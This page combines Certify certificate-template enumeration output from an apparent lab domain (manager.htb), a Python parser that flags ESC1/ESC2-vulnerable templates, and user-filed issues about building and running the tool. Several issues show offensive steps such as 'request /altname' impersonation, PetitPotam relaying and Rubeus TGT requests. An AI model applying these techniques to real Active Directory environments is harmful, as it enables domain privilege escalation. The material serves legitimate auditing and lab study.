msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : EFSRecovery
Schema Version                        : 1
Validity Period                       : 5 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : File Recovery
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : Machine
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Computers      S-1-5-21-4078382237-1492182817-2568127209-515
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DomainController
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : WebServer
Schema Version                        : 1
Validity Period                       : 2 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : SubCA
Schema Version                        : 1
Validity Period                       : 5 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : <null>
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DomainControllerAuthentication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DirectoryEmailReplication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Directory Service Email Replication
mspki-certificate-application-policy  : Directory Service Email Replication
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : KerberosAuthentication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

Certify completed in 00:00:08.1763365
Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp>
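What the listing above lets you judge is whether a template meets the ESC1 or ESC2 preconditions: a low-privileged principal holds Enrollment Rights, no manager approval (PEND_ALL_REQUESTS in mspki-enrollment-flag) or co-signature (Authorized Signatures Required) stands in the way, and the template either lets the enrollee supply the subject while carrying an authentication EKU (ESC1) or carries the Any Purpose EKU or no EKU at all (ESC2). Read that way, WebServer and SubCA have ENROLLEE_SUPPLIES_SUBJECT set but are enrollable only by Domain Admins and Enterprise Admins, and WebServer offers only Server Authentication; Machine is enrollable by Domain Computers but does not let the enrollee pick the subject. The Python below is an added example, not Certify's own code: it parses the text Certify prints, using trimmed copies of the Machine and WebServer blocks plus a hypothetical HelpdeskUser template constructed so that one match appears, and applies a simplified rendering of those preconditions. The low-privilege group list and EKU set are this example's assumptions; Certify's own find /vulnerable remains the authoritative check.

```python
"""Added example, not Certify's code: parse `Certify.exe find` output and flag templates
that meet the ESC1 / ESC2 preconditions described in the Certify research."""
import re

# Constructed input: Machine and WebServer mirror the listing above (trimmed);
# "HelpdeskUser" is hypothetical and exists only so that one template matches.
SAMPLE_FIND_OUTPUT = r"""
CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : Machine
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Computers      S-1-5-21-4078382237-1492182817-2568127209-515
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : WebServer
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Server Authentication
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : HelpdeskUser
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : PUBLISH_TO_DS
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Secure Email
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513

Certify completed in 00:00:08.1763365
"""
SID_RE = re.compile(r"(S-1-\d+(?:-\d+)+)\s*$")
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
LOW_PRIV_NAMES = {"domain users", "domain computers", "authenticated users", "everyone"}
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}            # Domain Users, Domain Computers (relative to the domain SID)

def parse_principal(text):
    # "MANAGER\Domain Admins   S-1-5-21-...-512" -> name + SID. Also copes with the SID
    # running straight onto the name, as Certify prints when a name overruns its column.
    text = text.strip()
    m = SID_RE.search(text)
    return {"name": text[:m.start()].strip(), "sid": m.group(1)} if m else {"name": text, "sid": None}

def split_list(value):
    return set() if value.strip() in ("", "<null>") else {v.strip() for v in value.split(",")}

def parse_find_output(text):
    """One dict per template: lower-cased attribute names plus an 'enrollment_rights' list."""
    templates, cur, in_enroll = [], None, False
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if line.startswith("Certify completed"):
            break
        if line.startswith("CA Name"):               # every template block opens with this row
            cur = {"enrollment_rights": []}
            templates.append(cur)
        if cur is None:
            continue
        if line.startswith("Enrollment Rights"):
            in_enroll = True
            cur["enrollment_rights"].append(parse_principal(line.split(":", 1)[1]))
        elif ":" in line:                             # any other "Key : Value" row
            key, value = (p.strip() for p in line.split(":", 1))
            cur[key.lower()] = value
            in_enroll = False
        elif in_enroll and SID_RE.search(line):       # continuation row under Enrollment Rights
            cur["enrollment_rights"].append(parse_principal(line))
        else:                                         # section headers such as "Object Control Permissions"
            in_enroll = False
    return templates

def is_low_priv(p):
    sid = p["sid"] or ""
    rid = sid.rsplit("-", 1)[-1] if sid.startswith("S-1-5-21-") else ""
    return (p["name"].rsplit("\\", 1)[-1].lower() in LOW_PRIV_NAMES
            or sid in LOW_PRIV_SIDS or rid in LOW_PRIV_RIDS)

def assess_template(t):
    """Simplified rendering of the published ESC1/ESC2 preconditions, not Certify's own logic."""
    low = [p["name"] for p in t["enrollment_rights"] if is_low_priv(p)]
    if (not low or int(t.get("authorized signatures required", "0")) > 0
            or "PEND_ALL_REQUESTS" in split_list(t.get("mspki-enrollment-flag", ""))):
        return []   # privileged-only enrollment, a required co-signature or manager approval blocks abuse
    ekus = split_list(t.get("pkiextendedkeyusage", "")) | split_list(t.get("mspki-certificate-application-policy", ""))
    findings = []
    if "ENROLLEE_SUPPLIES_SUBJECT" in split_list(t.get("mspki-certificate-name-flag", "")) and ekus & AUTH_EKUS:
        findings.append("ESC1: enrollee supplies subject + auth EKU; enrollable by " + ", ".join(low))
    if not ekus or "Any Purpose" in ekus:
        findings.append("ESC2: Any Purpose or no EKU; enrollable by " + ", ".join(low))
    return findings

def find_abusable(text):
    return {t["template name"]: f for t in parse_find_output(text) if (f := assess_template(t))}
```

Calling find_abusable() on the sample returns only HelpdeskUser, with a single ESC1 finding naming MANAGER\Domain Users: Machine drops out because the enrollee cannot supply the subject, and WebServer because only Domain Admins and Enterprise Admins can enroll. Feed it the full output of Certify.exe find (redirected to a file) to get the same triage over a real forest.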

compile error CS1617

Hi
I tried to compile the program using Visual Studio 2017, and I got this error:

CSC : error CS1617: Invalid option '9.0' for /langversion; must be ISO-1, ISO-2, Default or an integer in range 1 to 6.

Unable to build Certify - This project references NuGet package(s) that are missing on this computer

Hello,

Let me start off stating that I am far from a Visual Studio expert but I have successfully built projects before, including Rubeus.

I have installed Visual Studio 2019 Community Edition and I have downloaded the project, opened the project, and then selected "Release" (as opposed to "Debug") and then selected Build and I am getting the error below (as well as several others - see screenshot).

Severity Code Description Project File Line Suppression State
Error This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is ..\packages\dnMerge.0.5.15\build\dnMerge.targets. Certify C:\Users\rstrom\source\repos\Certify-main\Certify\Certify.csproj 129

Hopefully this is either something really stupid that I am not doing correctly or something easy to fix. Really looking to get this built so that I can do testing and the necessary validation of fixes.


Thanks much!

Crashes on Server 2012R2 - possibly related to certlib version.

As discussed on BH slack:

Compiled Certify on Win10 2004 with VS2019.
Executed via Cobalt Strike's execute-assembly on Windows Server 2012R2.
Certify.exe find /vulnerable appeared to work fine.
Certify.exe request /ca:REDACTED /template:REDACTED /altname:REDACTED threw the following exception:

System.InvalidCastException: Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass' to interface type 'CERTENROLLLib.IX509PrivateKey2'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{728AB362-217D-11DA-B2A4-000E7BBB2B09}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)).
   at System.StubHelpers.StubHelpers.GetCOMIPFromRCW(Object objSrc, IntPtr pCPCMD, IntPtr& ppTarget, Boolean& pfNeedsRelease)
   at CERTENROLLLib.CX509PrivateKeyClass.set_Length(Int32 pValue)
   at Certify.Cert.CreatePrivateKey(Boolean machineContext)
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

After some trial and error I found that by changing CreatePrivateKey() to return a CX509PrivateKey instead of IX509PrivateKey (and compiling it on Server2012) I could get Certify to request a cert and receive a valid-looking pem-formatted cert back from the CA.

Unfortunately, when trying to actually use the cert with Rubeus.exe asktgt I was getting KDC_ERR_CLIENT_NOT_TRUSTED. On further examination of the pem-formatted cert that Certify gave me back (with openssl x509 -in cert.pem -text) I noticed that the SAN field wasn't as expected, and was instead showing this:

            X509v3 Subject Alternative Name: 
                othername:<unsupported>

Let me know if there's any other details I can provide to help troubleshoot and I'll do my best.

[help wanted] AD CS /certsrv Endpoint authentication failed.

First of all, thanks for your excellent research work.

I'm trying to reproduce it using a Windows Server 2012 R2 with no patches installed either automatically or manually.

I installed AD CS using all default options offered by the setup wizard.

When I invoke the Python script from https://github.com/topotam/PetitPotam and use it together with ntlmrelayx from https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack, it just keeps telling me HTTP 401 Unauthorized.

Since this is an entirely default setup, I have no idea what is going wrong when I try to reproduce it.

More information might be useful for debugging:

  • Certificates can be requested from any other machine in the domain. The DC itself also has a certificate. Any other machine can also request a machine account certificate in the GUI.
  • The web endpoint /certsrv asks for a human user's credentials, and then it works as intended. But in this scenario, machine account NTLM authentication does not seem to work.
  • If I replace ntlmrelayx with Responder, I successfully get a response and a hash-captured notice from Responder, which means that at least the NTLM relay part works fine.

Thanks for your help in advance.

Virus alert

When I compile Certify.exe my computer alerts that there is a virus and the file is immediately deleted. I am hesitant to disable antivirus, but is that the only option?

Crash on Windows Server 2016

Hi,

I was trying out some requests and an exception is returned during execution.
Compiled on Windows Server 2022 with VS2019.

.\Certify.exe find /vulnerable or .\Certify.exe find /clientauth works fine.
The error comes when I try the following command: .\Certify.exe request /ca:REDACTED /template:REDACTED /altname:DOMAIN\REDACTED

[*] Action: Request a Certificates

[!] Unhandled Certify exception:

System.IO.FileNotFoundException: Could not load file or assembly 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].

No cert is returned after the exception.
The script is executed directly on an AD CS server, with admin rights.

Edit: This exception also occurs when using the download function.

Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass'

env:
CS : server 2012
Client : server 2012

When I request a certificate from a template, the following error occurs.

error description:


   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context : TEST\wangqiang
[*] No subject name specified, using current context as subject.

[*] Template : ESC1
[*] Subject : CN=Wang Qiang, OU=company, DC=test, DC=com
[*] AltName : cadmin

[!] Unhandled Certify exception:

System.InvalidCastException: Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass' to interface type 'CERTENROLLLib.IX509PrivateKey2'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{728AB362-217D-11DA-B2A4-000E7BBB2B09}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)).
at System.StubHelpers.StubHelpers.GetCOMIPFromRCW(Object objSrc, IntPtr pCPCMD, IntPtr& ppTarget, Boolean& pfNeedsRelease)
at CERTENROLLLib.CX509PrivateKeyClass.set_Length(Int32 pValue)
at Certify.Cert.CreatePrivateKey(Boolean machineContext)
at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName, String sidExtension)
at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install)
at Certify.Commands.Request.Execute(Dictionary`2 arguments)
at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Certify completed in 00:00:00.2333173

Building failed with CERTCLILib not found

Not sure if I'm missing something obvious, as I'm not familiar with .NET, but getting the following error when building.

1>C:\Users\User\Desktop\Certify-main\Certify\Lib\Cert.cs(4,7,4,17): error CS0246: The type or namespace name 'CERTCLILib' could not be found (are you missing a using directive or an assembly reference?)

asktgt

Does this tool have command of 'asktgt'?

Not working in non domain computer

Hi, you are probably already aware of the problems related to running Certify on a non-domain machine. Even though I tried different test cases (runas, netonly, ptt, cmd over pth), each time I got an exception and was not able to request a certificate. Could you please recommend what I can do about this in case you don't plan any code updates for this issue?
Thanks

Could not Connect to HKLM Hive

I am seeing this error recently when I run it in my lab domain. There are 3 CAs currently, and when running certify.exe from a domain-joined machine I get the following error as it loops through the CAs:

UserSpecifiedSAN : Could not connect to the HKLM hive - The network path was not found.

I am sure I am doing something wrong here, but I can't figure out what.

System.ArgumentNullException: Value cannot be null.

Running v1.1.0 on Win10 21H2 :
Certify.exe find /vulnerable

results in the following error message:

[!] Unhandled Certify exception:

System.ArgumentNullException: Value cannot be null.
Parameter name: source
   at System.Linq.Enumerable.Contains[TSource](IEnumerable`1 source, TSource value, IEqualityComparer`1 comparer)
   at Certify.Commands.Find.IsCertificateTemplateVulnerable(CertificateTemplate template, List`1 currentUserSids)
   at Certify.Commands.Find.<>c__DisplayClass19_0.<ShowVulnerableTemplates>b__0(CertificateTemplate t)
   at System.Linq.Enumerable.WhereSelectListIterator`2.MoveNext()
   at System.Linq.Buffer`1..ctor(IEnumerable`1 source)
   at System.Linq.Enumerable.ToArray[TSource](IEnumerable`1 source)
   at Certify.Commands.Find.ShowVulnerableTemplates(IEnumerable`1 templates, IEnumerable`1 cas, List`1 currentUserSids)
   at Certify.Commands.Find.FindTemplates(Boolean outputJSON)
   at Certify.Commands.Find.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Running version 1.0.0 is successful.

Unhandled Exception by meterpreter/shell.

If i run

.\Certify.exe find

from meterpreter (execute -i -f ...) or from a meterpreter shell, I get this error.

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=essos,DC=local'

[!] Unhandled Certify exception:

System.DirectoryServices.DirectoryServicesCOMException (0x80072020): An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at Certify.Lib.LdapOperations.GetEnterpriseCAs(String caName)
   at Certify.Commands.Find.FindTemplates(Boolean outputJSON)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:00.0272533

It works fine when I run it over RDP or WinRM, but how can I fix this problem?

GOAD, Microsoft Windows Server 2016 Standard Evaluation

Certify over Winrm

Hi,
I am new to blue teaming activities. I am trying to use Certify to work on abusing the AD CS service in my lab.

I am using a server for performing all attacks. I am logged into that PC as a standard user and trying to gain access to a user with local admin rights and then perform further enumeration.
I have used Whisker and Rubeus to get a TGT of the local admin and used winrs to connect to CMD as that admin on the same server.
